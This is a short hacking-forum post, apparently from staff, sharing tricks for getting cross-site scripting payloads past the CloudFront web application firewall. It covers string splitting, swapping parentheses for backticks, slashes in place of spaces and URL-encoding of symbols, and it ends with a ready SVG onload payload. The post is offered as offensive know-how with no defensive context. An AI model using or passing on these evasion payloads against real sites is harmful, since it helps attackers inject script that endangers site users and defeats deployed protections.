Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
772Cloudfront XSS WAF Bypassing
STAFF TEAM
#1
Cloudfront XSS WAF Bypassing.

1) alert = window["al"+"ert"]
2) bypass()with ``
3) replace space with /
4) encode symbols:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹` = %60

Not Encoded Payload:
<svg/onload=window["al"+"ert"]`1337`>

 fbichan fbichan ​​​​​​​ fbichan ​​​​​​​ fbichan
[-] The following 1 user Likes zozivuln's post:
  â€¢ licupico

Reply to this thread